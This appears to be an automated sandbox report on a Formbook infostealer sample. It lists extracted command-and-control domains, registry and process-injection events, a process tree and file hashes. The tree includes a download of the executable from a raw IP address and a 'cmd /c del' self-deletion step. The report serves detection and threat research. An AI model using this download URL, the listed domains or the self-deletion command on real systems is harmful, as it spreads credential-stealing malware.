Analysis
-
max time kernel
149s -
max time network
145s -
platform
windows10-2004_x64 -
resource
win10v2004-20230220-en -
resource tags
arch:x64arch:x86image:win10v2004-20230220-enlocale:en-usos:windows10-2004-x64system -
submitted
25/05/2023, 09:42
Static task
static1
URLScan task
urlscan1
Malware Config
Extracted
formbook
4.1
gg04
clothandsoulfabricllc.com
kx1336.com
4638.global
fixlaunchcredtunionmemb.online
indivexport.com
betuluzun.online
colossusboutique.com
hgcst.com
authorizer.online
hong-travel.com
globalwealthstrategiesco.com
fobberq.com
tribally.net
cook-a.com
todipjane.africa
membershipexams.africa
3dseal.online
abris-spb.ru
mkkkkk.net
chargecentral.store
chaudhrytraders.com
kooperatifemlak.com
cutematxhy.com
kasoraenterprises.com
juicydisco.app
bryconbenefits.com
kaleebet955.xyz
gfxadeel.tech
hanyawiki.xyz
vineuse.co.uk
dgoguincho.net
kngm-metall.ru
anime-room.com
clients-web.com
freeadmissiontickets.com
ctxlab.online
ds85.top
glossaryfashions.com
threesome.africa
invictusbr.online
dinyu001.com
cilumer.com
internationalfreight.tech
choicetricker.com
lukasladistores.africa
data-analyticsdegree.com
downloadtemplate.site
acebit.xyz
sunliftathleisure.com
socialunites.org.uk
4483.uk
aboutmeclothes.online
lovetext.africa
luieshop.com
xn--opoderosodogo-7eb.app
buggsfurniture.com
fanslylove.com
estockuk.co.uk
linkonweb.com
customscubadiving.com
sxcontu.xyz
thetobacconist.africa
africansinuk.co.uk
havenadvisorypartners.net
coquitoweek.com
Signatures
-
Formbook payload 4 IoCs
resource yara_rule behavioral1/memory/3108-159-0x0000000000400000-0x000000000042F000-memory.dmp formbook behavioral1/memory/3108-167-0x0000000000400000-0x000000000042F000-memory.dmp formbook behavioral1/memory/3208-170-0x00000000011C0000-0x00000000011EF000-memory.dmp formbook behavioral1/memory/3208-172-0x00000000011C0000-0x00000000011EF000-memory.dmp formbook -
Downloads MZ/PE file
-
Executes dropped EXE 2 IoCs
pid Process 2908 adolfzx.exe 3108 adolfzx.exe -
Suspicious use of SetThreadContext 4 IoCs
description pid Process procid_target PID 2908 set thread context of 3108 2908 adolfzx.exe 94 PID 3108 set thread context of 3116 3108 adolfzx.exe 29 PID 3208 set thread context of 3116 3208 netsh.exe 29 PID 3208 set thread context of 1680 3208 netsh.exe 82 -
Modifies Internet Explorer Phishing Filter 1 TTPs 2 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-1529757233-3489015626-3409890339-1000\Software\Microsoft\Internet Explorer\PhishingFilter iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-1529757233-3489015626-3409890339-1000\SOFTWARE\Microsoft\Internet Explorer\PhishingFilter\ClientSupported_MigrationTime = 2c9ba0669e45d901 iexplore.exe -
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-1529757233-3489015626-3409890339-1000\SOFTWARE\Microsoft\Internet Explorer\Main\FullScreen = "no" iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-1529757233-3489015626-3409890339-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000bdf56721518b2645ac366a00b1e0ab6500000000020000000000106600000001000020000000bfba3cadd7cd7e196579494f8ccd62a9657620e003db3ae33329e29b6870cb29000000000e80000000020000200000000575fbed18c04f8db73ac4ba463c2ed22e5a4d0301e1e8f4ae07c8a30598b0a42000000016ce259310c77bb85e32bde7346ae2b09d2030599e7749a7cc7d1ed2494f2703400000009883855946717e12bafece20f83993edbd8c074697a7dddba7d58afe47bc47ed9dfa90b26d1e06f68649b62b94b2dd7556431233efe7171221c70401074780ce iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-1529757233-3489015626-3409890339-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000bdf56721518b2645ac366a00b1e0ab6500000000020000000000106600000001000020000000537d91c4f40355a44174f31375078d26d2367d6c1a3de07f5f5b621b1b8871e2000000000e8000000002000020000000903698e10f0e50187d2bea1be1507e7f5bc1ec4a47522ae4a2d08b4a01a0714d200000008de68bf4b9d6b450391227d63cdd7c54ceb73dde9b398df51cb9f5622464d2e74000000034038a0cdafef371150e573a5b4f506148798a3b606a25b939d8d218dc90dadc5722d7cd8d0c3b4495b070b0fed9df2d31867b1fe3823049759faa613b4faf58 iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1529757233-3489015626-3409890339-1000\Software\Microsoft\Internet Explorer\DomainSuggestion iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-1529757233-3489015626-3409890339-1000\SOFTWARE\Microsoft\Internet Explorer\DomainSuggestion\NextUpdateDate = "391779930" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1529757233-3489015626-3409890339-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1529757233-3489015626-3409890339-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-1529757233-3489015626-3409890339-1000\SOFTWARE\Microsoft\Internet Explorer\MINIE\TabBandWidth = "500" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-1529757233-3489015626-3409890339-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastTTLHighDateTime = "50" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1529757233-3489015626-3409890339-1000\SOFTWARE\Microsoft\Internet Explorer\DomainSuggestion iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1529757233-3489015626-3409890339-1000\SOFTWARE\Microsoft\Internet Explorer\DomainSuggestion\FileNames iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1529757233-3489015626-3409890339-1000\SOFTWARE\Microsoft\Internet Explorer\DomainSuggestion\FileNames\ iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-1529757233-3489015626-3409890339-1000\SOFTWARE\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-1529757233-3489015626-3409890339-1000\SOFTWARE\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1529757233-3489015626-3409890339-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames\ iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1529757233-3489015626-3409890339-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-1529757233-3489015626-3409890339-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NTPFirstRun = "1" iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-1529757233-3489015626-3409890339-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = 50d18f13fe8ed901 iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-1529757233-3489015626-3409890339-1000\SOFTWARE\Microsoft\Internet Explorer\Recovery\AdminActive\{3DC21837-FAF1-11ED-ABF7-D660CAC54930} = "0" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1529757233-3489015626-3409890339-1000\Software\Microsoft\Internet Explorer\MINIE iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1529757233-3489015626-3409890339-1000\Software\Microsoft\Internet Explorer\RepId iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-1529757233-3489015626-3409890339-1000\SOFTWARE\Microsoft\Internet Explorer\RepId\PublicId = "{6B90AC62-9768-46DD-8F73-5A3756BB9D4A}" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1529757233-3489015626-3409890339-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1529757233-3489015626-3409890339-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1529757233-3489015626-3409890339-1000\Software\Microsoft\Internet Explorer\Main IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-1529757233-3489015626-3409890339-1000\Software\Microsoft\Internet Explorer\VersionManager iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-1529757233-3489015626-3409890339-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateLowDateTime = "307102392" iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-1529757233-3489015626-3409890339-1000\SOFTWARE\Microsoft\Internet Explorer\DomainSuggestion\FileNames\en-US = "en-US.1" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1529757233-3489015626-3409890339-1000\Software\Microsoft\Internet Explorer\Main iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-1529757233-3489015626-3409890339-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastUpdateLowDateTime = "307102392" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-1529757233-3489015626-3409890339-1000\SOFTWARE\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-1529757233-3489015626-3409890339-1000\SOFTWARE\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000 iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-1529757233-3489015626-3409890339-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastUpdateHighDateTime = "31035134" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-1529757233-3489015626-3409890339-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastTTLLowDateTime = "1251635200" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-1529757233-3489015626-3409890339-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateHighDateTime = "31035134" iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-1529757233-3489015626-3409890339-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = c0f06413fe8ed901 iexplore.exe -
Suspicious behavior: EnumeratesProcesses 36 IoCs
pid Process 3108 adolfzx.exe 3108 adolfzx.exe 3108 adolfzx.exe 3108 adolfzx.exe 3208 netsh.exe 3208 netsh.exe 3208 netsh.exe 3208 netsh.exe 3208 netsh.exe 3208 netsh.exe 3208 netsh.exe 3208 netsh.exe 3208 netsh.exe 3208 netsh.exe 3208 netsh.exe 3208 netsh.exe 3208 netsh.exe 3208 netsh.exe 3208 netsh.exe 3208 netsh.exe 3208 netsh.exe 3208 netsh.exe 3208 netsh.exe 3208 netsh.exe 3208 netsh.exe 3208 netsh.exe 3208 netsh.exe 3208 netsh.exe 3208 netsh.exe 3208 netsh.exe 3208 netsh.exe 3208 netsh.exe 3208 netsh.exe 3208 netsh.exe 3208 netsh.exe 3208 netsh.exe -
Suspicious behavior: MapViewOfSection 7 IoCs
pid Process 3108 adolfzx.exe 3108 adolfzx.exe 3108 adolfzx.exe 3208 netsh.exe 3208 netsh.exe 3208 netsh.exe 3208 netsh.exe -
Suspicious use of AdjustPrivilegeToken 6 IoCs
description pid Process Token: SeDebugPrivilege 3108 adolfzx.exe Token: SeDebugPrivilege 3208 netsh.exe Token: SeShutdownPrivilege 3116 Explorer.EXE Token: SeCreatePagefilePrivilege 3116 Explorer.EXE Token: SeShutdownPrivilege 3116 Explorer.EXE Token: SeCreatePagefilePrivilege 3116 Explorer.EXE -
Suspicious use of FindShellTrayWindow 2 IoCs
pid Process 1680 iexplore.exe 1680 iexplore.exe -
Suspicious use of SetWindowsHookEx 4 IoCs
pid Process 1680 iexplore.exe 1680 iexplore.exe 824 IEXPLORE.EXE 824 IEXPLORE.EXE -
Suspicious use of WriteProcessMemory 18 IoCs
description pid Process procid_target PID 1680 wrote to memory of 824 1680 iexplore.exe 83 PID 1680 wrote to memory of 824 1680 iexplore.exe 83 PID 1680 wrote to memory of 824 1680 iexplore.exe 83 PID 1680 wrote to memory of 2908 1680 iexplore.exe 85 PID 1680 wrote to memory of 2908 1680 iexplore.exe 85 PID 1680 wrote to memory of 2908 1680 iexplore.exe 85 PID 2908 wrote to memory of 3108 2908 adolfzx.exe 94 PID 2908 wrote to memory of 3108 2908 adolfzx.exe 94 PID 2908 wrote to memory of 3108 2908 adolfzx.exe 94 PID 2908 wrote to memory of 3108 2908 adolfzx.exe 94 PID 2908 wrote to memory of 3108 2908 adolfzx.exe 94 PID 2908 wrote to memory of 3108 2908 adolfzx.exe 94 PID 3116 wrote to memory of 3208 3116 Explorer.EXE 95 PID 3116 wrote to memory of 3208 3116 Explorer.EXE 95 PID 3116 wrote to memory of 3208 3116 Explorer.EXE 95 PID 3208 wrote to memory of 5104 3208 netsh.exe 96 PID 3208 wrote to memory of 5104 3208 netsh.exe 96 PID 3208 wrote to memory of 5104 3208 netsh.exe 96 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Uses Volume Shadow Copy WMI provider
The Volume Shadow Copy service is used to manage backups/snapshots.
-
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
Processes
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3116 -
C:\Program Files\Internet Explorer\iexplore.exe"C:\Program Files\Internet Explorer\iexplore.exe" http://194.180.48.59/adolfzx.exe2⤵
- Modifies Internet Explorer Phishing Filter
- Modifies Internet Explorer settings
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1680 -
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1680 CREDAT:17410 /prefetch:23⤵
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
PID:824
-
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\4HAJQ22Y\adolfzx.exe"C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\4HAJQ22Y\adolfzx.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:2908 -
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\4HAJQ22Y\adolfzx.exe"C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\4HAJQ22Y\adolfzx.exe"4⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
PID:3108
-
-
-
-
C:\Windows\SysWOW64\netsh.exe"C:\Windows\SysWOW64\netsh.exe"2⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3208 -
C:\Windows\SysWOW64\cmd.exe/c del "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\4HAJQ22Y\adolfzx.exe"3⤵PID:5104
-
-
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
906KB
MD5372daff38ea8b876b01803b474c7f687
SHA13e27eb6a6e9ec8f8be6609c85bb6b16376907fcf
SHA256625f5caa0e4422a01de12f875b7acf8c4edb699f36a7237c18bf3df7772a7e6c
SHA5129a27b0c2f7f3bd66f30f2bffbde4c44d82b541ade528c034ba1cd4f0facd89d472a98550834b8cf79b67a40afd50dd5eb02cd87dacc161c6a88b2b26a0eb87e6
-
Filesize
906KB
MD5372daff38ea8b876b01803b474c7f687
SHA13e27eb6a6e9ec8f8be6609c85bb6b16376907fcf
SHA256625f5caa0e4422a01de12f875b7acf8c4edb699f36a7237c18bf3df7772a7e6c
SHA5129a27b0c2f7f3bd66f30f2bffbde4c44d82b541ade528c034ba1cd4f0facd89d472a98550834b8cf79b67a40afd50dd5eb02cd87dacc161c6a88b2b26a0eb87e6
-
Filesize
906KB
MD5372daff38ea8b876b01803b474c7f687
SHA13e27eb6a6e9ec8f8be6609c85bb6b16376907fcf
SHA256625f5caa0e4422a01de12f875b7acf8c4edb699f36a7237c18bf3df7772a7e6c
SHA5129a27b0c2f7f3bd66f30f2bffbde4c44d82b541ade528c034ba1cd4f0facd89d472a98550834b8cf79b67a40afd50dd5eb02cd87dacc161c6a88b2b26a0eb87e6
-
Filesize
906KB
MD5372daff38ea8b876b01803b474c7f687
SHA13e27eb6a6e9ec8f8be6609c85bb6b16376907fcf
SHA256625f5caa0e4422a01de12f875b7acf8c4edb699f36a7237c18bf3df7772a7e6c
SHA5129a27b0c2f7f3bd66f30f2bffbde4c44d82b541ade528c034ba1cd4f0facd89d472a98550834b8cf79b67a40afd50dd5eb02cd87dacc161c6a88b2b26a0eb87e6
-
Filesize
17KB
MD55a34cb996293fde2cb7a4ac89587393a
SHA13c96c993500690d1a77873cd62bc639b3a10653f
SHA256c6a5377cbc07eece33790cfc70572e12c7a48ad8296be25c0cc805a1f384dbad
SHA512e1b7d0107733f81937415104e70f68b1be6fd0ca65dccf4ff72637943d44278d3a77f704aedff59d2dbc0d56a609b2590c8ec0dd6bc48ab30f1dad0c07a0a3ee